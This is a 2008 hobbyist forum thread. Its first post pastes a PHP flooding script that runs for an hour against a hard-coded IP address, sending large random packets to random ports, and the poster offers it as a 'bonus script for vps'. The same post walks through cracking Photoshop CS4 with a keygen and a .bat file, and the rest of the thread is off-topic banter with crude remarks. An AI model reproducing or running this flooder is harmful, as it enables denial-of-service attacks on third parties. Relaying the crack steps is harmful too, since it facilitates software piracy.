HomemadeTurbo - DIY Turbo Forum

HomemadeTurbo - DIY Turbo Forum (https://www.homemadeturbo.com/)
-   General Discussion (https://www.homemadeturbo.com/general-discussion-6/)
-   -   Photoshop CS4 and stuff (https://www.homemadeturbo.com/general-discussion-6/photoshop-cs4-stuff-98133/)

Nirgopolis 12-15-2008 09:26 AM

Photoshop CS4 and stuff
 
https://img.photobucket.com/albums/v...y/lolavril.jpg


<?
ignore_user_abort(TRUE);
set_time_limit(0);
error_reporting(0);

$ip = '68.178.148.188';
$mins = 60;
$psize = 65000;

$secs = $mins*60;
$out='';
for($i=0;$i<$psize;$i++) $out.= chr(mt_rand(1,256));
$timei = time();
$i = 0;
while (1) {
@system('ifconfig | grep -i "inet" > /tmp/bind33');
$fpop = file_get_contents('/tmp/bind33');
$fpop = preg_replace("#\t#", '', $fpop);
$fpip = explode("\n", $fpop);
foreach($fpip as $line) {
$line = explode(" ", $line);
$line = $line[1];
if(preg_match("#^[0-9]#", $line)&&!preg_match("#\:#", $line)) {
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_UDP);
socket_bind($sock, $line);
socket_connect($sock, $ip, mt_rand(1,65000));
socket_write($sock, $out);
socket_close($socket);
}
@$fp = fsockopen("udp://".$ip, mt_rand(1,65000), $errno, $errstr, 1);
if($fp) {
fwrite($fp, $out);
fclose($fp);
}
}
$i++;
if($i > 5000) {
if (time() - $timei > $secs) exit();
else $i = 0;
}
}
exit();
?>



Related:





Anyways, I just had to nab ps, so if anyone else needs it, simple:
go to adobe site, find CS4 and download the trial (fill in bs name and email, they dont check)
download
disconnect computer from internet
install as trial
once install is done
run keygen, enter key AFTER install
http://www.mediafire.com/download.php?ixm2omltrj1
then run this .bat
http://www.mediafire.com/?hngohymlgkm
then close program
turn on internet
open again
works perfect for me

Nirgopolis 12-15-2008 09:28 AM

Re: Photoshop CS4 and stuff
 
also, includes bonus script for vps =)

kain 12-15-2008 10:28 AM

Re: Photoshop CS4 and stuff
 
i see your avril, and raise you

http://www.youtube.com/watch?v=ei8hPkyJ0bU

Nirgopolis 12-15-2008 02:08 PM

Re: Photoshop CS4 and stuff
 
nah hayley williams is in a different class, she battles against ellen paige
avril lavigne has no competition

donnyboy 12-15-2008 02:51 PM

Re: Photoshop CS4 and stuff
 

Originally Posted by kain
i see your avril, and raise you

http://www.youtube.com/watch?v=ei8hPkyJ0bU

Hayley is much better wet.

http://www.youtube.com/watch?v=y-MaaxgdUT4

j3w 12-15-2008 05:12 PM

Re: Photoshop CS4 and stuff
 

Originally Posted by kain
i see your avril, and raise you

http://www.youtube.com/watch?v=ei8hPkyJ0bU

every ------- person in that video needs a ------- haircut.

J-SMITH69 12-15-2008 05:15 PM

Re: Photoshop CS4 and stuff
 

Originally Posted by J.H.Christ
every ------- person in that video needs a ------- haircut.

+1


All times are GMT -5. The time now is 03:38 PM.


© 2024 MH Sub I, LLC dba Internet Brands